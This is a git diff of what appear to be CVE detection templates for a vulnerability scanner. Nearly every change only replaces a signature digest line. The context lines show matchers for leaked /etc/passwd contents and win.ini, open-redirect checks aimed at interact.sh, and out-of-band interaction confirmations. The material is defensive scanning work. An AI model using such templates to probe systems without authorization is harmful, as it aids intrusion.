http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 4a0a00473045022100bc360a408d71fd68fc9724eedecfae297995fcacd435dc9de77b308bcf129c1c022070e50351fcc75578355c5179c8717ae8ef5f6e369b39bf7a857526f584ae26fc:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008cbff1e72693f95cf9f2e7cd6ca2dda77de67cba004428598464615185a6aa16022100e0060db1f3b7c7f1bcf92cb146ea19e2fbe533faab471021f772ef0e06bd0e53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index 079cc3531d..0f7a05f200 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -38,5 +38,4 @@ http: part: body words: - '<META http-equiv="Refresh" content="0;URL=http://interact.sh">' - -# digest: 4b0a00483046022100b5a38e9bf6890195de8fd9135c8a516418c9fa9d82d4fb04e78237ba13c4596a02210099c40bed03c3ba8db537ba78f7ef346655dfa95848056cb893ae0e0f4d7833dd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a5cfad78d49d7ffa3bb2deae0dc7ca1913143d029ffa2f442463049cf3f8dbbc022028fb0e8a7c1eda21dc09c93e1e4915b5a6da92c46c4f4687b255afd5facd72d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index cea50afb85..923ca15628 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e5bf185bc30bd69bdb86450a61c498cd8d6a084e44a8faec754b4bb1cbbfc969022100c9e655d1c33ecc4ae1428c342b7b9d3845494bbd4fc84dea5934251fd845c38b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100997f85a7f6c2d322063eeb807aeee190c12d89ed7e90659105dd697186afd98b022053fa71d788c4355f72ec1f525839c1c9fe682ca0565ccb5b33be44527f199a38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1273.yaml b/http/cves/2018/CVE-2018-1273.yaml index a67a79a0bb..af566aee66 100644 --- a/http/cves/2018/CVE-2018-1273.yaml +++ b/http/cves/2018/CVE-2018-1273.yaml @@ -53,5 +53,4 @@ http: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or - -# digest: 4a0a00473045022100ce2f5d1ef0a0acec1b343108c5807b77249d86dd089dcbc7bb8daeda3cdb643902204bc462434ef15b46acc2236d0a71d91061b492c428bca9facbf4844be0258046:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022021aca5448b33839e88125bb44465b89beef83a11cefd34fe867837b79524966f02203ea24cda8dd5fb0dc039b63319bc99bfe96b3fcbf429322ceec274f61e41bd5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12909.yaml b/http/cves/2018/CVE-2018-12909.yaml index 2cc2274d1d..839f6fbcf0 100644 --- a/http/cves/2018/CVE-2018-12909.yaml +++ b/http/cves/2018/CVE-2018-12909.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220107605a52d57f3853ef440831ec9aad40477c8e7cbd3bfd432e2b2596f105ca40221008a6e27095af0bfae000722c14bc8afc561f5953ef27d63b184bbfc408ee5686a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220284232c22cd4a3b304e85a9d9e215c09ad2254e2cc6b7ba2f03254c45a38df73022100e3eb34f67a29f72a2cb7202216cae8ee76b20d55991b14c840cdc5c6f5c9a71f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12998.yaml b/http/cves/2018/CVE-2018-12998.yaml index 923ef97e05..a489522f7b 100644 --- a/http/cves/2018/CVE-2018-12998.yaml +++ b/http/cves/2018/CVE-2018-12998.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c7412a33cc840c2155ef6811e08fe8968119e8a9d19abff2c2913cca7560745b0221009d55b28978ca11f2360afab90d8009f887f1957b7a13acf2607d3c9778b591b7:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220647c5c158e19860a0860bbe915ab61f37f0cdf2fa2ac28298e7488260383eaac02205141bef8306d8cc1fa78f2a895556c201f9013a3bdd71ac7a04d815835bfcfd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index 2f4c80d8b3..18a4edf799 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201327fe5c87667c74a6d789ddd47ea91758fca4b89c6ba1350feda1cceda61ab3022069ade89f9575a82117ee974da0e353df92fadd6341c0c530385acd51ef8e2f08:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fefc3b5e11f39b4c4de743919bcea02b6fa4b4dc4e86af2c3b703d924be3902902204ecf589acf6f1b98cc96e15ecdfb90a38a156d82c73cda0b84d4493b73020403:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index b0369cbb5e..25fd192601 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502207fc2f4b859927ef42cc0aa927d54f8bd1f30531d0172360f5b6accc5dfced102022100a54e15521b8619c92752685423c0877d9051340ab0a547365a0e812b433f86e7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022068e7f321ce1ecc2d75d6e91ce37e5896ac19efa69772c6b895cb762a4364e49f022100ee1f7f07e3f0ef51da429d429f2d8d88c4978e155d4c8731e7afb3b77d1f0e03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index 2370ba7411..9b003a2ede 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008f50b6f2ac4a090e98b8e49d7b4f7c4aa3145a9308abc3371b2e4c26ff9790cb02206755956e9a35c69bfeb046fa126d17ba61ede77b005352ee84804714c3ff67e0:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bfbc67fac4fd79829c4d012770e00a6535c28fa0e1ce301c6aa5537ad547f5b902210090e448e9248371c28a4a0943a51fc8468b8ef82120a6b9daf14416079a8c0560:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14064.yaml b/http/cves/2018/CVE-2018-14064.yaml index 0cdaeb67f7..a676c96483 100644 --- a/http/cves/2018/CVE-2018-14064.yaml +++ b/http/cves/2018/CVE-2018-14064.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210086ba1f4835bb352d7368af6db620fbc3a17ee681055b8159273899addb7db7b5022100f4b8c42333aa0013e552806a21b0972b868fdb8d0ebb7cdbba9a5e95434010d0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207b6ef254fb480b45c39a4a7f2c9d24f94c95ff27bba4c12522ee3f7bf73c42e3022100de8667d128a6d689c9941d534ab11c8bc1ad7714c7bbcfd89ce392681e95a9ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index 2cd295bd8a..37cfa7a89a 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -39,5 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 4b0a00483046022100d21bce3feccab11cbf3772b0648e531eddbdcfaed31a751cf540095fff4632e10221008bd4a7f5c719d674a45534817c62c5edb86fecc80b7c060fe2cd370b5f7d6e2f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204ccf8aaef92cbe7c68384d747cf3396c7d6f537b3d80689c04bbd1882181355f022100ca09a3414f7a6c591354c36047287875898974fb0809c461f477405b5fa3df08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index a76bec7368..7fa0a4277c 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 301 - -# digest: 4a0a00473045022100dd07a2cdccdb0a878dd7dae6f74c325eb28c4f28f444c7086124704059b06e8602202d6f52f68f747d46c163817a0aa0c0f3b89d22b9285ce6f8908b297b8f5e1e84:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a5d89de12e90690f678b88b246fa8c65225310ca2efed9a2cf150127cc4d7cb702202235b5eecbbc0ff17fae68eee97ee92c14e380c12169e5991a28e9c208acac5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml index 4c364581a9..3cb997b311 100644 --- a/http/cves/2018/CVE-2018-14912.yaml +++ b/http/cves/2018/CVE-2018-14912.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a87e5fe09cfffc650e3d241a332693049b4253129019a8f4aee66d0665590ce0022042c5201570e6c8884691c84470b4053640c8c0f871db16b193d95ebbfb04f750:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220597ac5d6eecf19f6e935f6b7ef14270accaa5d389964f5ef5298d2577d64617002205e16dd2ae532f6dcdb3c054ede1c8cd001ba9be728ff55416c3529aa206c34ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index 06b8e473ef..e9d66a8792 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b826b2a5d269293c3136ad75c90764eeb1a381c70b3c8a70f3cf27b3fa270a940220417f822d31bcb5ddd2ab58f7b8760306754b2094367a7118ff5162c1a82f655a:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022064c4d254e8146eac5740737a6250a88d532fcd996e1dd26425a4d1a2d2aef5ac0220234fa4ee7e6c96bb701ce5957b09149a85c71ee8e1e0a4e1753d90758289c6b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index 31e46de418..e36048ffd1 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210099fcd268015cd92a869187dc8015f665b18a68fb58b3002dbc1fe19ef200045f02210090ee205e81c1be9eb77ce6c0bcea945b1671ae946a88e20908e896056896d774:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200c7ef1a748b199f4d78f339a984f8fa23936742a93dff66a5e8146f9097bb710022100b52ffdafdbee8af45ae2af6be6854f1f0e294b06912c60d1a6736d9711d4280f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index f651d813d7..2f045a3fc8 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -34,5 +34,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 490a00463044022026902c49b301ca76141a8c5c5a3a6fdaab3667e134d27d83bc4e9c039c04c15c022033650505fdcdd48513b82ac07393ef026c1394be9a537875def6db59373309da:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207a1fa91af6a94c2698f19c7e2da2f3d960d196aff73ad80a7307a3be4c7face102207956772c7195d3e080f65e5f956eb9047b634cc5fc3d8e50489840af546b36a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml index 9975146aeb..52c392f704 100644 --- a/http/cves/2018/CVE-2018-15138.yaml +++ b/http/cves/2018/CVE-2018-15138.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022033a15ec42b4f73881ffc1b405fbe15d5db3671d55dd5cd7b2493248f58e59acf022100d38426a845aa0acad400c50005c6ffe38255d32b1865a6138f491ef931259f8d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022048250fcddd9e9611d30e39cefb2e3c6ae0a184f7b312de016443fd2dd56d34b6022100a416859d2a502524bee8fffff83ab635fbc1992e606419148d695d8ff4ea0252:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index 35c3431e34..89697cfce8 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -36,5 +36,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# digest: 4b0a00483046022100f033f36cbcd9cb00999b409f0ff676f8dc506b085778a0eb8b8d5bb2f2f9d9dd022100820543eb028e1ecce318ae1521f0731e5dc158f90a95b92531c4d6dcf805ac96:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204bd35fc8fc1eec767e2a2834bcf1ed835d8d07e4bbbcb393cc80c0b6481c1e13022100c977531ca745c169466710fec15abee1f4dc15589faa3ce08cefe564cf25336c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml index 10eac24f1a..ed8c4c6b9b 100644 --- a/http/cves/2018/CVE-2018-15745.yaml +++ b/http/cves/2018/CVE-2018-15745.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220416bb246d7367bce30195023920da058e70019901daab49b293e1b62b8073271022100d026eef6e7bf2ce2703ed6c92ba6b93197c82b2ee2dba6fd0876da11fdf1d2e5:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022057970e707a55f0572bf4a5609ece9f82b5546fed3c6f1d12ea1e6befc885acc002200488e1a552e0c215653b6180eb776efcb5b0d0041b736e5b773e8ddbc1fe0090:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml index b43f2c0c9c..c19ff17979 100644 --- a/http/cves/2018/CVE-2018-15917.yaml +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -56,5 +56,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100cd47ff5e28ff122ea0f6c0b19118805b3758dcb6a20a69a22d9bd19f1e836e6a022100efddc396d22768d16c3c4bee0a36fbf41fe7aeac0bddaa8f890932ae77d0271a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207c2c547145ad2cbe36d554ebe8b6ed25431c6a3b0c9ad80f3b335f25cf1b8a04022100aeb9b7094651c0f83f83b8a6a21c37edbcbc9a83d0cbdb63b81092952083b0aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16059.yaml b/http/cves/2018/CVE-2018-16059.yaml index bc485b8c63..9fb8b3bdbe 100644 --- a/http/cves/2018/CVE-2018-16059.yaml +++ b/http/cves/2018/CVE-2018-16059.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022005c54a8e9bb04955a0c9432e237c4325631d8628c58749a34bf2505c4bbce7e50220701c2a194581e6420879b2a74acdfd55f64b584421b7b0d730b87e1b750c25da:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a0a5133ad9cdbc5adc21e89cb6551919043ca9ba525621f791d8b77266e599f6022100bccb926ab7edea0e7b89791cd4ba8499c6c56aa566aed26e84e42b63369abfed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16133.yaml b/http/cves/2018/CVE-2018-16133.yaml index eb83449b25..e4482b56bc 100644 --- a/http/cves/2018/CVE-2018-16133.yaml +++ b/http/cves/2018/CVE-2018-16133.yaml @@ -41,5 +41,4 @@ http: - "fonts" - "extensions" condition: and - -# digest: 490a004630440220765f62a46f00e0929f884a3957a27edba9538b824ad0d01df5b2934aac4021980220704cf2f05c5c4dad9a68c90a73a11961815d158ee49313d77f6b4284442a76c7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c15f9c9499f4e059c24734fa0ce0a9cad60980d3cdcc03f53fb12e155ef9d8d1022100e47128693aff1ce4e563b396268dc240e34ca77d1055f41387ad7262d92e0b7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index 09a8aeba2b..0a87e30759 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022005d2c5fcff69e0cff9b4103c6a6c431f63ef909deaea87d77e8cfb8add26b8ce0221008b30bf6fa6685670feaee8b93f541d52aa4979466542666c1aeefd1544d9ec80:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210092d1dd53aed03ab080ef8db1dd64738d864ecc1e4c9a2eaaf89b631155c750c5022100e684fdc51cb871fe9080408e49309956694604d16f14dd698748a0ea1d5860d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index 6cf540112c..07c2922c2d 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -47,5 +47,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "images") && contains(body, "title")' condition: and - -# digest: 490a0046304402202265ab45ddd298ce16beb38d5939bc80dbbfb60bf374bda9076453bee0d9c2b0022012c9d75110c3e3395c6423fcfa2f6d7884f46fdbe88226e3e24d2062c82a411a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e2d0172613748636216cdd798bdd1196389445479e36e39f8ddaeb114fc8bf0d022064c4fcd1167bf59565d468881519253bcfd0c4e5e68631820cfe78de7fa4117a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index 9cf08fd0c0..527d3b9b38 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -41,5 +41,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - http - -# digest: 4a0a0047304502205c97b46a48fb8e41e2fb2a4faef03f68b75fe6859616509b067697c70136b2c2022100d7b6a56e612e934a7f88f7c4de0a35a12534486ace69940b04bd968985ec9fa3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220167292496dcabaa877a0221c1f1a2e758950c1705b6cce9c604277471e096403022100ef6ff02d7231b3a4f11f053fdca15db40500768769d4486d4c1dab492eebb92f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml index 02b9366960..d95c6a0983 100644 --- a/http/cves/2018/CVE-2018-16283.yaml +++ b/http/cves/2018/CVE-2018-16283.yaml @@ -38,5 +38,4 @@ http: part: body regex: - "root:.*:0:0:" - -# digest: 490a0046304402205744a3d2b07129d5fb247bd85e25f6fe9610846f8773fc803f183673a079e4a502207b3140904a05f1ab5e55c0f23e2b69c7ee4d7e526c7345e13be73ca7961c446f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100faca859ae0617981e935cbeba58ec7d23a514cebab9a1db9b0a48338d22583b50220100cfcf0a7644cd6138b0e9af05c2c6feb92e949113d9698e610748f425849a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml index 10c148272f..dde810d043 100644 --- a/http/cves/2018/CVE-2018-16299.yaml +++ b/http/cves/2018/CVE-2018-16299.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402206400706c03426af92b5d2df594494ac930ccb535a21b641eb485f822e1b0ec7202203532e75b412fce626adac50a411a1c5186425c9ab034262c4f0d617d964d8382:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220549348711bc0d45ced6d351ab79af8fef524860c8489492e47d4bc0d5774caa10221009a58012c6b3f7f0cccb61125f26d51ce428426e74595e0b2fbe0aca8eb99549c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index 94452ca152..3dc34c13ac 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -44,5 +44,4 @@ http: - "** Platform sources **" - "** Application sources **" condition: and - -# digest: 4b0a004830460221009ec5196b38613b8d15996708d86b9ff0e63a5cfe3ad7afc3c51aafe5d3cc56ee022100ba108581c192456cec7906d8048fdabad95eff75d9cc628495717b1240df4b08:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022072ac3d470cd88de40d46d6e47862e7edd9aac3f7219054720cbc9b9023d742120220150dc79d038fb9f4a75c1fb8ce21c79e19e92bcd64ed26c25e251e4ace832227:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16670.yaml b/http/cves/2018/CVE-2018-16670.yaml index 3f75022ad3..7dbcede263 100644 --- a/http/cves/2018/CVE-2018-16670.yaml +++ b/http/cves/2018/CVE-2018-16670.yaml @@ -44,5 +44,4 @@ http: - "<values><variable><id>" - "Reader.STATUS" condition: and - -# digest: 4a0a0047304502206aeb07e4d4ce00b3b8cebf46e2d738294ebf8c0d7a48879c3b934cda9159fe57022100c47ec25e080aa049cc722263157cba326f84116a74caef83b97ef0cb2dbf148b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220480601c230ceea33229d250e491590207d10e1c7d153cef074f231ea95018d13022100bedbd69a3c9f1d0d4cd74a8f638f5756d726726b50ed549d0bd156c15848d093:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index 29d335cf32..b7a46b89b3 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -46,5 +46,4 @@ http: part: body regex: - "(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])" - -# digest: 490a0046304402200c7cd661e16d5e3b04cd2c17ec01235d703e115f05c7d5ef5083c7e771fc7a0e022053ce71f2603fe45c7726c62a0a53313329022c398765c1cc65bb182038e8fed6:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220514c5d34c29684f52e8125f490a85d8f3050a2101f763ec61b682bf5d637227b02202d8795b230633e497c85be55734f6f99775c107ade27c79f0fbef9671f653e7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index dee4a3f6ec..d3f84a7a47 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221009e2d93631cd15fcf7c4f38a3263b4dd81d815cc21746c22d80ac4a010d00641c022100ff6cf3778af14999cbea637fbc4c00353ab547888b6260baf4dd729afd178b7e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d37e5398878a9f1ee91f0f58faa5b2d09f3358b4cee0703ec0da3f235452743a02206d599eabda535de43b81e802ffa93deaeb09db150305b05cad2aa5df1af3c0cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index f48c35dee2..4f30e7f41c 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -38,5 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 4b0a00483046022100b558830af82a67a66784d2c2a98d8f3db650d66bea7fd8adb0ffaccec0ffb4ba022100cf2a9acca18b5bfb8e2ea8a44dc96ae92d49161e464e48498b5debc4ab4fe9ad:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e1d85856a04ab4c73cac62ac01864f00278b97d2e37dc67fcd7d05f5e207b2d202203510f417529079cca1d540a727323029311e9083bbbf72f4039e74b331ac6cf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index da5a931e88..eaa28379dc 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100865f6b84e62f5713aa8de331f2a43137c3aa4b365f84a9a11df6e6b20f1481590220345b719bed6000a3dbb647cd064aa9589984f86cd8ca28d0247f797bf9920090:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200ea602508b759f3f7e8ca0358a5346290cd509315ec59f3d1dd655e844314f7002206dd5a122472b9afde2b8d2aa23912ce3c8f3a03e6f6ce49649ab03fdff90d83a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index b37319501d..7cd102a539 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022058e4b5ecd1d39875f3b3f144a3b03b858f5f3af20428a57997739e85cc376081022100926cdff3f19ab0bcb9675654e1c4d5c3108732b4eeb75fc25d52affbd608b0b9:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c5f075fa284fade54b84b2ae118effbd5875f82bd60712025009c5c25cc09160022100d09b34ec35720883c541f50553f51835ee3a9bd1b08d83141ec46aa5c972a33e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index 6d338c800e..d0be471746 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402207b25567389ba731ac7e71a83662abd7b73eaeed4091803f5f5f98dd41a7b26b002203206933ea35012b4f3732d8a280beeaae1286567735c49bfd1560f272a603298:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c43571f42164fa9889f5803dd3d4466d9219232faa3341460a0bac425928bc5f02210085754e659f8122489eca159dfdbee9c733209bfd547bddc423c6a2bfa5e267a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml index 022738428f..6f2de77777 100644 --- a/http/cves/2018/CVE-2018-17153.yaml +++ b/http/cves/2018/CVE-2018-17153.yaml @@ -47,5 +47,4 @@ http: - contains(body, "ganalytics") - status_code == 200 condition: and - -# digest: 4b0a00483046022100ba7b2fc8fedd9c1c9bfecffb3266ffb7cdf9d5b789bc3aa0a4b806f5761645c5022100bd935695c788714ecc950a6c76ea00d5b4ad44ec1333bed663f0a289ecdad1b8:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022021cd8e66902fceacfeb1f9d706ba885886d032fc4115f1c069c914281b71e334022100d4b355ae724368ad9bb44303bf51236230dd3057eb0390eb25cf6daf2372b8ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index a4d45dd315..f8773eddec 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -51,5 +51,4 @@ http: part: header words: - "application/json" 